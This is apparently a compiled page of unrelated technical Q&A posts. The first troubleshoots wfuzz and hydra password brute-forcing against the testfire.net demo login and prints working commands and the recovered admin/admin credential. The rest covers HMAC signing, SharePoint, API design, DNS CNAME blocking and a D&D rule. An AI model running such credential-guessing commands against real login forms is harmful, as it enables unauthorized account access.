wfuzz shows --hs responses when it should hide them

Test site: http://testfire.net/login.jsp

Error when login failed: Login Failed: We're sorry, but this username or password was not found in our system. Please try again.

Web Form

    <form action="doLogin" method="post" name="login" id="login" onsubmit="return (confirminput(login));">
      <table>
        <tbody>
          <tr>
            <td>Username:</td>
            <td><input type="text" id="uid" name="uid" value="" style="width: 150px;"></td>
            <td></td>
          </tr>
          <tr>
            <td>Password:</td>
            <td><input type="password" id="passw" name="passw" style="width: 150px;"></td>
          </tr>
          <tr>
            <td></td>
            <td><input type="submit" name="btnSubmit" value="Login"></td>
          </tr>
        </tbody>
      </table>
    </form>

The actual password is admin too. Therefore, I created simple passlist.txt for this purpose.

    wolf@linux:~$ cat passlist.txt
    admin
    pwd
    pass
    password
    wolf@linux:~$

wfuzz flag

--ss/hs regex             : Show/Hide responses with the specified regex within the content 

Here are few tests, but none of them really work.

wfuzz -cz file,passlist.txt --hs Failed -d "uid=admin&passw=FUZZ&btnSubmit=Login" http://testfire.net/doLogin

    wolf@linux:~$ wfuzz -cz file,passlist.txt --hs Failed -d "uid=admin&passw=FUZZ&btnSubmit=Login" http://testfire.net/doLogin

    Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.

    ********************************************************
    * Wfuzz 2.4.5 - The Web Fuzzer                         *
    ********************************************************

    Target: http://testfire.net/doLogin
    Total requests: 4

    ===================================================================
    ID           Response   Lines    Word     Chars       Payload
    ===================================================================

    000000003:   302        0 L      0 W      0 Ch        "pass"
    000000004:   302        0 L      0 W      0 Ch        "password"
    000000001:   302        0 L      0 W      0 Ch        "admin"
    000000002:   302        0 L      0 W      0 Ch        "pwd"

    Total time: 0.517212
    Processed Requests: 4
    Filtered Requests: 0
    Requests/sec.: 7.733766

    wolf@linux:~$

wfuzz -cz file,passlist.txt --hs Failed -d "uid=admin&passw=FUZZ&btnSubmit=Login" http://testfire.net/login.jsp

    wolf@linux:~$ wfuzz -cz file,passlist.txt --hs Failed -d "uid=admin&passw=FUZZ&btnSubmit=Login" http://testfire.net/login.jsp

    Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.

    ********************************************************
    * Wfuzz 2.4.5 - The Web Fuzzer                         *
    ********************************************************

    Target: http://testfire.net/login.jsp
    Total requests: 4

    ===================================================================
    ID           Response   Lines    Word     Chars       Payload
    ===================================================================

    000000003:   200        194 L    582 W    8519 Ch     "pass"
    000000001:   200        194 L    582 W    8519 Ch     "admin"
    000000002:   200        194 L    582 W    8519 Ch     "pwd"
    000000004:   200        194 L    582 W    8519 Ch     "password"

    Total time: 0.583132
    Processed Requests: 4
    Filtered Requests: 0
    Requests/sec.: 6.859507

    wolf@linux:~$

It didn't work even though the right user/pass combination was there.

Any idea what’s wrong in this wfuzz syntax?

hydra can do this without any problem and identified the credential accurately.

    wolf@linux:~$ hydra testfire.net http-post-form \
    > '/doLogin:uid=^USER^&passw=^PASS^&btnSubmit=Login:Login failed' \
    > -l admin -P passlist.txt -V
    Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

    Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-06-08 08:57:36
    [DATA] max 4 tasks per 1 server, overall 4 tasks, 4 login tries (l:1/p:4), ~1 try per task
    [DATA] attacking http-post-form://testfire.net:80/doLogin:uid=^USER^&passw=^PASS^&btnSubmit=Login:Login failed
    [ATTEMPT] target testfire.net - login "admin" - pass "admin" - 1 of 4 [child 0] (0/0)
    [ATTEMPT] target testfire.net - login "admin" - pass "pwd" - 2 of 4 [child 1] (0/0)
    [ATTEMPT] target testfire.net - login "admin" - pass "pass" - 3 of 4 [child 2] (0/0)
    [ATTEMPT] target testfire.net - login "admin" - pass "password" - 4 of 4 [child 3] (0/0)
    [80][http-post-form] host: testfire.net   login: admin   password: admin
    1 of 1 target successfully completed, 1 valid password found
    Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-06-08 08:57:39
    wolf@linux:~$
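An added example, not code from the post above: the first wfuzz run shows every POST to /doLogin answered with a 302 and a 0 Ch body, so a regex filter on that first hop has nothing to match; the "Login Failed" text only appears on the page the redirect leads to. The second run posts to login.jsp, which serves the form rather than processing it (the form's action is doLogin), so all four responses are the same 8519-character page. The script below stands up a local stand-in for that flow and applies the same "hide if the body matches" filter once without and once with following the redirect. The listening port, the /bank/main.jsp success page and the handler logic are assumptions of this demo, not facts checked against testfire.net. In wfuzz itself the equivalent of the second pass is the -L / --follow option.

```python
"""Added example (not from the original post): why a --hs style regex on the
first hop misses a login failure that only shows up after a redirect.

Assumptions: the local handler below mimics /doLogin (302 with empty body)
and the pages it redirects to; /bank/main.jsp as the success page is made up.
"""
import re
import threading
import urllib.error
import urllib.parse
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

FAIL_TEXT = ("Login Failed: We're sorry, but this username or password "
             "was not found in our system. Please try again.")
VALID = {"admin": "admin"}  # the credential the post says is correct


class LoginHandler(BaseHTTPRequestHandler):
    """Mimics /doLogin (302, empty body) and the pages it redirects to."""

    def do_POST(self):
        length = int(self.headers.get("Content-Length", 0))
        form = urllib.parse.parse_qs(self.rfile.read(length).decode())
        ok = VALID.get(form.get("uid", [""])[0]) == form.get("passw", [""])[0]
        # Assumed: the POST itself never carries the error text, only a redirect.
        self.send_response(302)
        self.send_header("Location", "/bank/main.jsp" if ok else "/login.jsp?error=1")
        self.send_header("Content-Length", "0")
        self.end_headers()

    def do_GET(self):
        body = FAIL_TEXT if self.path.startswith("/login.jsp") else "Welcome, admin"
        data = body.encode()
        self.send_response(200)
        self.send_header("Content-Length", str(len(data)))
        self.end_headers()
        self.wfile.write(data)

    def log_message(self, *args):  # silence per-request logging
        pass


class NoRedirect(urllib.request.HTTPRedirectHandler):
    """Surface the 302 itself, the way wfuzz does without -L/--follow."""

    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def fuzz(base_url, passwords, hide_regex, follow):
    """Return (payload, status, body_length) for each response NOT hidden by hide_regex."""
    opener = urllib.request.build_opener() if follow else urllib.request.build_opener(NoRedirect)
    kept = []
    for pw in passwords:
        data = urllib.parse.urlencode({"uid": "admin", "passw": pw, "btnSubmit": "Login"}).encode()
        try:
            with opener.open(urllib.request.Request(base_url + "/doLogin", data=data)) as resp:
                status, body = resp.status, resp.read().decode()
        except urllib.error.HTTPError as err:  # raised for the unfollowed 302
            status, body = err.code, err.read().decode()
        if not re.search(hide_regex, body):
            kept.append((pw, status, len(body)))
    return kept


def demo(passwords=("admin", "pwd", "pass", "password")):  # constructed, like passlist.txt
    server = HTTPServer(("127.0.0.1", 0), LoginHandler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    base = f"http://127.0.0.1:{server.server_port}"
    try:
        first_hop = fuzz(base, passwords, "Failed", follow=False)
        followed = fuzz(base, passwords, "Failed", follow=True)
    finally:
        server.shutdown()
        server.server_close()
    return first_hop, followed


if __name__ == "__main__":
    for label, rows in zip(("first hop only", "following redirects"), demo()):
        print(label, rows)
```

Without following the redirect all four payloads survive the filter (302, empty body, nothing for the regex to match); with the redirect followed only "admin" survives, because its landing page is the only one that does not contain "Failed".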

I am signing (HMAC) outgoing webhooks to allow users to verify their source, should I also sign outgoing responses?

To allow api users to verify the authenticity of outgoing webhooks, I am using a similar model to slack:

  • Concatenate timestamp and body, HMAC with pre-shared key, add timestamp and HMAC digest to headers.

  • Recipient does the same, and compares to the digest in the header.

I can either implement this exclusively on outgoing webhooks, or I can implement it as middleware that performs this process on both outgoing webhooks, and responses to requests.

Is doing the latter good practice? A good idea?

Limits on responses in SP survey

I want to design a survey in SP 2016 as an event reservation form, with a choice of times available. Since each time would have only a fixed number of spaces available, can each selection have a separate limit on spaces available?

Also, I want to reserve spaces for a certain group of users. But instead of blocking their access to the form with the default “No permissions” message, I want to display a friendly message that says they’re already signed up.

How much of that can be done in the XSLT through SP Designer?

Mystic UA: are Exacting Query responses given vocally or telepathically?

The 2017 UA Mystic has various Psionic Disciplines. Under Telepathic Contact is an option called Exacting Query, whose description states:

Exacting Query (2 psi). As an action, you target one creature you can communicate with via telepathy. The target must make an Intelligence saving throw. On a failed save, the target truthfully answers one question you ask it via telepathy. On a successful save, the target is unaffected, and you can’t use this ability on it again until you finish a long rest. A creature is immune to this ability if it is immune to being charmed.

This question is asked via telepathy, but is it answered via telepathy or vocally? The Mystic’s telepathy (gained at level 2) seems to be described as only operating one way (from the Mystic to any creature the Mystic can see within 120 feet). So does this imply that the answer to an Exacting Query would be vocal?

Embedding Microsoft forms in SharePoint online to show (Questions and Responses) – Classic mode

I would like to use the Microsoft forms for a quick poll on an intranet (Classic mode) and was wondering if there is a way to redirect the user to the responses page/link after a survey or poll has been submitted? Or a way to have the questions and responses tabbed side by side?

Any resources or tips would be appreciated

How detailed should API responses be?

I would like to define rules that describe how detailed an API response should be.


To save you the effort of reading: It is of course also possible to keep the whole thing in the API documentation, but I am asking for an exact rule / best practice.

And by the way, I am not using ORM tools, I write plain SQL.


Let’s say there are the resources user and group. Users can have multiple groups and groups can have multiple users. When asking for a User by ID, would you also return the groups he is in? Would this group array only contain the IDs or contain detailed group objects?

If the group objects were detailed, there would be a risk that they would again contain user objects (cycles => users have groups which have users…). It is also possible that some nested objects are relevant and others are not. Some nested objects may need to be provided.

If you ask for a user, the database will only return the user. If the group should be supplied as an attribute, the query would have to be extended.

I am now also thinking of the extensibility of the API. When do I only return the user, when do I return a user with all its groups? I want to keep the API structure clean. Given these example routes

  • /users => return all users

  • /users/:id => return one user by user id

how would you decide which nested objects should be returned?

If you want to generalize the whole thing now, are there fixed rules?
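An added example, not the poster's code: one way to settle which nested objects a /users/:id response carries. The default representation holds related resources as IDs only (one cheap query, no cycles); the caller opts into detail with an explicit, whitelisted expand list whose dotted paths bound the nesting depth, so user -> groups -> users cannot recurse forever. It uses plain SQL against an in-memory SQLite database, as the post says no ORM is involved; the schema, sample rows and the ?expand= parameter name are assumptions of this example.

```python
"""Added example (not from the original post): ID-only references by default,
whitelisted ?expand= paths for nested detail, with depth bounded by the
longest allowed path.  Schema, rows and parameter name are assumptions.
"""
import sqlite3

SCHEMA = """
CREATE TABLE users      (id INTEGER PRIMARY KEY, name TEXT NOT NULL);
CREATE TABLE user_group (id INTEGER PRIMARY KEY, name TEXT NOT NULL);
CREATE TABLE membership (user_id  INTEGER NOT NULL REFERENCES users(id),
                         group_id INTEGER NOT NULL REFERENCES user_group(id),
                         PRIMARY KEY (user_id, group_id));
INSERT INTO users      VALUES (1, 'alice'), (2, 'bob');
INSERT INTO user_group VALUES (10, 'admins'), (20, 'devs');
INSERT INTO membership VALUES (1, 10), (1, 20), (2, 20);
"""

# Per-route whitelist of expansion paths; nesting depth is bounded by the longest one.
USER_EXPANSIONS = {"groups", "groups.users"}


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def parse_expand(query_value, allowed=USER_EXPANSIONS):
    """Turn '?expand=groups,groups.users' into a set; reject anything not whitelisted."""
    wanted = {p.strip() for p in query_value.split(",") if p.strip()}
    unknown = wanted - allowed
    if unknown:
        raise ValueError(f"unsupported expand: {sorted(unknown)}")
    return wanted


def _nested(expand, prefix):
    """Strip one level: {'groups', 'groups.users'} -> {'users'} for prefix 'groups'."""
    return {p[len(prefix) + 1:] for p in expand if p.startswith(prefix + ".")}


def get_user(conn, user_id, expand=frozenset()):
    row = conn.execute("SELECT id, name FROM users WHERE id = ?", (user_id,)).fetchone()
    if row is None:
        return None
    user = {"id": row[0], "name": row[1]}
    user["group_ids"] = [r[0] for r in conn.execute(
        "SELECT group_id FROM membership WHERE user_id = ? ORDER BY group_id", (user_id,))]
    if "groups" in expand:  # the extra queries run only when the client asked for them
        user["groups"] = [get_group(conn, g, _nested(expand, "groups")) for g in user["group_ids"]]
    return user


def get_group(conn, group_id, expand=frozenset()):
    row = conn.execute("SELECT id, name FROM user_group WHERE id = ?", (group_id,)).fetchone()
    if row is None:
        return None
    group = {"id": row[0], "name": row[1]}
    group["user_ids"] = [r[0] for r in conn.execute(
        "SELECT user_id FROM membership WHERE group_id = ? ORDER BY user_id", (group_id,))]
    if "users" in expand:  # expand set shrinks at every level, so this always terminates
        group["users"] = [get_user(conn, u, _nested(expand, "users")) for u in group["user_ids"]]
    return group


if __name__ == "__main__":
    db = make_db()
    print(get_user(db, 1))
    print(get_user(db, 1, parse_expand("groups,groups.users")))
```

Because every recursive call receives a strictly shorter set of paths, the response can never contain more levels than the whitelist allows, and an unknown path is refused up front instead of silently ignored.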

Securing DNS by blocking queries AND responses [Dnscrypt questions]

Visiting facebook.com you will query s.update.fbsbx.com. s.update.fbsbx.com is a CNAME to s.agentanalytics.com. Currently, the only way to block s.agentanalytics.com is to block s.update.fbsbx.com via hosts. Windows DNS client, and even wildcard blocking resolvers such as Dnscrypt do not have the ability to block parent domains of CNAME replies.

    13:19:30 dnsmasq[1211]: query[A] s.update.fbsbx.com from 192.168.50.142
    13:19:30 dnsmasq[1211]: forwarded s.update.fbsbx.com to 127.0.0.1
    13:19:30 dnsmasq[1211]: reply s.update.fbsbx.com is <CNAME>
    13:19:30 dnsmasq[1211]: reply s.agentanalytics.com is <CNAME>
    13:19:30 dnsmasq[1211]: reply agentanalytics.com is 52.20.233.11
    13:19:30 dnsmasq[1211]: reply agentanalytics.com is 35.170.177.215
    13:19:30 dnsmasq[1211]: reply agentanalytics.com is 34.235.44.232
    13:19:30 dnsmasq[1211]: reply agentanalytics.com is 34.194.252.192
    13:19:30 dnsmasq[1211]: reply agentanalytics.com is 18.206.130.128
    13:19:30 dnsmasq[1211]: reply agentanalytics.com is 52.202.107.183
    13:19:30 dnsmasq[1211]: reply agentanalytics.com is 18.209.97.44
    13:19:30 dnsmasq[1211]: reply agentanalytics.com is 35.173.82.169
    13:19:30 dnsmasq[1211]: reply agentanalytics.com is 23.22.178.204
    13:19:30 dnsmasq[1211]: reply agentanalytics.com is 18.206.103.1

Sometimes there may be multiple CNAMES that reveal their actual hidden associations in replies, example:

    13:55:28 dnsmasq[26607]: query[A] su.itunes.apple.com from 192.168.50.96
    13:55:28 dnsmasq[26607]: forwarded su.itunes.apple.com to 127.0.0.1
    13:55:29 dnsmasq[26607]: reply su.itunes.apple.com is <CNAME>
    13:55:29 dnsmasq[26607]: reply su-cdn.itunes-apple.com.akadns.net is <CNAME>
    13:55:29 dnsmasq[26607]: reply su-applak.itunes-apple.com.akadns.net is <CNAME>
    13:55:29 dnsmasq[26607]: reply su.itunes.apple.com.edgekey.net is <CNAME>
    13:55:29 dnsmasq[26607]: reply e673.dsce9.akamaiedge.net is 184.50.162.217

    13:55:29 dnsmasq[26607]: query[A] xp.apple.com from 192.168.50.96
    13:55:29 dnsmasq[26607]: forwarded xp.apple.com to 127.0.0.1
    13:55:29 dnsmasq[26607]: reply xp.apple.com is <CNAME>
    13:55:29 dnsmasq[26607]: reply xp.itunes-apple.com.akadns.net is <CNAME>
    13:55:29 dnsmasq[26607]: reply xp.apple.com.edgekey.net is <CNAME>
    13:55:29 dnsmasq[26607]: reply e17437.dscb.akamaiedge.net is 23.214.192.96

DNSCRYPT allows wildcard blocking of outgoing domain queries for example [analytics] but it will not block incoming responses nor the caching of s.agentanalytics.com ips. Or for example, if one blocks s.agentanalytics.com in windows hosts, or dnscrypt, it will still be accessible via s.update.fbsbx.com. I showed dnscrypt’s coder how this analytics domain bypasses his wildcard protections, and he told me “These entries are not within the parent zone and are ignored by all stub resolvers.” And here he goes into more detail

Is this incorrect?

If these IPs are ignored by the stub resolver [that includes the Windows DNS client] as he previously claimed, why are they cached to begin with? Are these IPs potentially usable by a state party/MITM, as suggested here? I saw s.update.fbsbx.com in uMatrix; what IP would it then be associated with, except the s.agentanalytics.com IP addresses?

If he is incorrect, and DNSCRYPT wildcard blocks refused to cache these IP responses, one could better secure their networks.

Here is another example: 21 queries occur when an iPhone immediately connects to WiFi, and the responses include 72 domains & IPs that are not in the parent domain. He is saying this is all ignored.

Here, https://pastebin.com/GYSEw1dY
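An added example, not part of the post above: a small parser for dnsmasq query logs that reconstructs the CNAME chain behind each lookup and lists every name in it that lies outside the zone the client actually asked for, which is exactly what the two log excerpts above show (s.update.fbsbx.com resolving through s.agentanalytics.com, su.itunes.apple.com through akadns.net, edgekey.net and akamaiedge.net). It also applies a wildcard block pattern to the whole chain rather than only to the queried name, the behaviour the post says its resolver lacks. The embedded log text is a trimmed copy of the post's own lines; the two-label "registrable domain" rule is an assumption of this example (a real tool would consult the Public Suffix List).

```python
"""Added example (not from the original post): parse dnsmasq log lines,
rebuild the CNAME chain per query, flag off-zone names, and run a wildcard
block check over the whole chain.  LOG is trimmed from the post's excerpts;
registrable() is a two-label approximation, not a Public Suffix List lookup.
"""
import fnmatch
import re

LOG = """\
13:19:30 dnsmasq[1211]: query[A] s.update.fbsbx.com from 192.168.50.142
13:19:30 dnsmasq[1211]: forwarded s.update.fbsbx.com to 127.0.0.1
13:19:30 dnsmasq[1211]: reply s.update.fbsbx.com is <CNAME>
13:19:30 dnsmasq[1211]: reply s.agentanalytics.com is <CNAME>
13:19:30 dnsmasq[1211]: reply agentanalytics.com is 52.20.233.11
13:19:30 dnsmasq[1211]: reply agentanalytics.com is 35.170.177.215
13:55:28 dnsmasq[26607]: query[A] su.itunes.apple.com from 192.168.50.96
13:55:28 dnsmasq[26607]: forwarded su.itunes.apple.com to 127.0.0.1
13:55:29 dnsmasq[26607]: reply su.itunes.apple.com is <CNAME>
13:55:29 dnsmasq[26607]: reply su-cdn.itunes-apple.com.akadns.net is <CNAME>
13:55:29 dnsmasq[26607]: reply su-applak.itunes-apple.com.akadns.net is <CNAME>
13:55:29 dnsmasq[26607]: reply su.itunes.apple.com.edgekey.net is <CNAME>
13:55:29 dnsmasq[26607]: reply e673.dsce9.akamaiedge.net is 184.50.162.217
"""

# "<time> dnsmasq[<pid>]: query[A] <name> from <client>"  or  "... reply <name> is <value>"
LINE = re.compile(r"^\S+ dnsmasq\[\d+\]: (query\[\w+\]|reply) (\S+) (?:from|is) (\S+)$")


def parse_dnsmasq(text):
    """Map each queried name to its chain of owner names (in reply order) and final addresses."""
    lookups, current = {}, None
    for line in text.splitlines():
        m = LINE.match(line)
        if not m:
            continue  # "forwarded ..." and anything else we do not need
        kind, name, value = m.groups()
        if kind.startswith("query"):
            current = lookups.setdefault(name, {"chain": [name], "addresses": []})
        elif current is not None:
            if name != current["chain"][-1]:
                current["chain"].append(name)  # next hop in the CNAME chain
            if value != "<CNAME>":
                current["addresses"].append(value)  # terminal A record
    return lookups


def registrable(name):
    """Assumed approximation: the last two labels (no Public Suffix List)."""
    return ".".join(name.lower().rstrip(".").split(".")[-2:])


def off_zone(chain):
    """Names the client never asked for: registrable domain differs from the query's."""
    origin = registrable(chain[0])
    return [n for n in chain[1:] if registrable(n) != origin]


def blocked_by(chain, patterns):
    """Wildcard block check over the whole chain, not only the queried name."""
    return [n for n in chain if any(fnmatch.fnmatch(n, p) for p in patterns)]


if __name__ == "__main__":
    for qname, info in parse_dnsmasq(LOG).items():
        print(qname, "->", " -> ".join(info["chain"][1:]), info["addresses"])
        print("  off-zone:", off_zone(info["chain"]))
        print("  matches *analytics*:", blocked_by(info["chain"], ["*analytics*"]))
```

Run against the first excerpt, a pattern of *analytics* matches nothing when applied to the queried name alone but matches two names once the chain is considered, which is the gap the post describes between blocking the query and blocking what the answer actually resolves through.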

Microsoft Flow Record Form responses in SharePoint Yes/No

This is my first time on StackExchange, and I haven’t found the answer to my question in the forum…

I have built a Form in order to get some data recorded into a SharePoint list using Flow. I would like to fill a SharePoint item with the format type Yes/No. In Flow, I cannot even select a field from the Form I made (I setup some other SharePoint items and it worked like a charm).

Can you please let me know how to format the question in Form, and how to setup my Flow?

Many thanks in advance!

Should I hash responses from server?

I am hashing all requests to my server with a secret token known by only the server and my mobile app, to prevent malicious apps from using my servers.

Should I also do this on the responses from the server, to validate the servers identity in the app, or would this be useless?

I'm, of course, using HTTPS already, and pinned certificates.
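An added example serving both the webhook-signing question earlier on this page and the question just above; it is not either poster's code. It implements the Slack-style scheme the webhook question describes (concatenate timestamp and body, HMAC with a pre-shared key, carry timestamp and digest in headers; the recipient recomputes and compares) as one sign/verify pair that is indifferent to direction, so the same middleware can cover an outgoing webhook, the response to a request, or a mobile client's requests. The header names, the "v1=" prefix and the 300-second window are assumptions of this example.

```python
"""Added example (not from either original post): timestamp-bound HMAC
signing and verification usable for webhooks, responses and requests alike.
Header names, the "v1=" prefix and the replay window are assumptions.
"""
import hashlib
import hmac
import time

TS_HEADER = "X-Signature-Timestamp"
SIG_HEADER = "X-Signature"
TOLERANCE = 300  # seconds of clock skew / replay window tolerated (assumed)


def _digest(secret, timestamp, body):
    # Bind timestamp and body together; the separator keeps "1"+"23" distinct from "12"+"3".
    msg = f"{timestamp}:".encode() + body
    return "v1=" + hmac.new(secret, msg, hashlib.sha256).hexdigest()


def sign(secret, body, now=None):
    """Headers to attach to a webhook, a response, or a request."""
    ts = int(time.time()) if now is None else now
    return {TS_HEADER: str(ts), SIG_HEADER: _digest(secret, ts, body)}


def verify(secret, headers, body, now=None):
    """Recipient side: reject stale timestamps, then compare digests in constant time."""
    ts_raw, sig = headers.get(TS_HEADER), headers.get(SIG_HEADER)
    if ts_raw is None or sig is None:
        return False
    try:
        ts = int(ts_raw)
    except ValueError:
        return False
    current = int(time.time()) if now is None else now
    if abs(current - ts) > TOLERANCE:
        return False  # outside the replay window; do not even check the MAC
    return hmac.compare_digest(_digest(secret, ts, body), sig)


def exchange(secret, request_body, response_body, now):
    """Both directions with one key: the client signs its request and the server
    verifies it; the server signs its response and the client verifies that."""
    req_headers = sign(secret, request_body, now)
    request_ok = verify(secret, req_headers, request_body, now)
    resp_headers = sign(secret, response_body, now + 1)
    response_ok = verify(secret, resp_headers, response_body, now + 1)
    return {"request_ok": request_ok, "response_ok": response_ok}


if __name__ == "__main__":
    key = b"pre-shared-key"  # constructed for the demo
    hdrs = sign(key, b'{"event":"ping"}')
    print(hdrs, verify(key, hdrs, b'{"event":"ping"}'))
    print(exchange(key, b"req", b"resp", int(time.time())))
```

Because the timestamp is inside the MAC'd message, a recipient cannot be fooled by moving it; the window only bounds how long a captured message stays replayable, so a receiver that must reject replays inside the window additionally has to remember the digests it has already accepted. Nothing in verify() depends on which side produced the message, which is what lets one middleware cover both webhooks and responses.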